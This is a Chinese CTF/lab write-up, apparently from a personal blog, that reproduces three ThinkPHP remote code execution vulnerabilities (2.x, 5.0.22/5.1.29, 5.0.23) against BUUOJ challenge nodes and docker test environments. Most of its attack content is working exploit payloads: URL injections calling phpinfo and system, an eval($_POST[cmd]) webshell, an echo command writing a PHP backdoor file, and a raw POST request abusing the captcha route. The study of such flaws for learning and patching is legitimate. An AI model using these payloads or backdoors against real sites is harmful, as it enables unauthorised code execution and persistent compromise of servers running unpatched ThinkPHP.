Thinkphp2.x RCE漏洞

漏洞复现题目。

https://buuoj.cn/challenges#[ThinkPHP]2-Rce

可以利用的利用此漏洞的payload:

http://node4.buuoj.cn:26636/index.php?s=index/index/name/${@phpinfo()}

当我想利用system命令来写脚本时候结果出现了

从报错信息来看，引号会被过滤，于是考虑采用eval方法来创建一个后门

payload:

http://node4.buuoj.cn:26636/index.php?s=index/index/name/${@eval($_POST[cmd])}

同时post一个cmd=phpinfo();

发现成功回显，说明后门创建成功了。

然后可以利用这个后门做很多事情。

ThinkPHP5的RCE漏洞

第一个是影响范围5.0.22/5.1.29的

首先

ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞

ThinkPHP是一款运用极广的PHP开发框架。其版本5中，由于没有正确处理控制器名，导致在网站没有开启强制路由的情况下（即默认情况下）可以执行任意方法，从而导致远程命令执行漏洞。

参考链接：

漏洞环境

运行ThinkPHP 5.0.20版本：

docker-compose up -d

环境启动后，访问http://your-ip:8080即可看到ThinkPHP默认启动页面。

漏洞复现

直接访问http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1，即可执行phpinfo：

1	`http://node4.buuoj.cn:29059/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls`

ls命令能够成功执行，于是利用linux的echo来创建一个后门。

payload:

http://node4.buuoj.cn:29059/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo '<?php eval($_POST[cmd]);?>' > shell.php

在这里创建后门成功。

ThinkPHP5 5.0.23 远程代码执行漏洞

ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中，获取method的方法中没有正确处理方法名，导致攻击者可以调用Request类任意方法并构造利用链，从而导致远程代码执行漏洞。

https://github.com/top-think/framework/commit/4a4b5e64fa4c46f851b4004005bff5f3196de003

漏洞环境

执行如下命令启动一个默认的thinkphp 5.0.23环境：

 docker-compose up -d

环境启动后，访问http://your-ip:8080即可看到默认的ThinkPHP启动页面。

漏洞复现

发送数据包：

 POST /index.php?s=captcha HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72
 
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

成功执行id命令：

同理创建后门，

后门又创建成功

posted @ 2022-07-05 19:55 FPointmaple 阅读(580) 评论(1) 编辑收藏举报

刷新页面返回顶部

登录后才能查看或发表评论，立即登录或者逛逛博客园首页

相关博文：

· [NPUCTF2020]ReadlezPHP 1

· [0CTF 2016]piapiapia

· CTFer成长记录——CTF之Web专题·攻防世界-php_rce

· thinkphp 框架漏洞复现

· Thinkphp漏洞复现

阅读排行：
· 阿里最新开源QwQ-32B，效果媲美deepseek-r1满血版，部署成本又又又降低了！
· SQL Server 2025 AI相关能力初探
· 单线程的Redis速度为什么快？
· AI编程工具终极对决：字节Trae VS Cursor，谁才是开发者新宠？
· 开源Multi-agent AI智能体框架aevatar.ai，欢迎大家贡献代码

公告

2753天2小时53分29秒

昵称： FPointmaple
园龄： 3年3个月
粉丝： 4
关注： 4

+加关注

2025年3月

日

一

二

三

四

五

六

随笔档案 (36)

文章分类 (4)

web(4)

文章档案 (4)

2021年12月(4)

ThinkPHP漏洞

FPointzero

ThinkPHP漏洞

Thinkphp2.x RCE漏洞

ThinkPHP5的RCE漏洞

ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞

漏洞环境

漏洞复现

ThinkPHP5 5.0.23 远程代码执行漏洞

漏洞环境

漏洞复现

公告

搜索

常用链接

最新随笔

随笔档案 (36)

文章分类 (4)

文章档案 (4)

相册 (8)

friends

阅读排行榜

评论排行榜

推荐排行榜

最新评论

	POST /index.php?s=captcha HTTP/1.1
	Host: localhost
	Accept-Encoding: gzip, deflate
	Accept: /
	Accept-Language: en
	User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
	Connection: close
	Content-Type: application/x-www-form-urlencoded
	Content-Length: 72

	_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id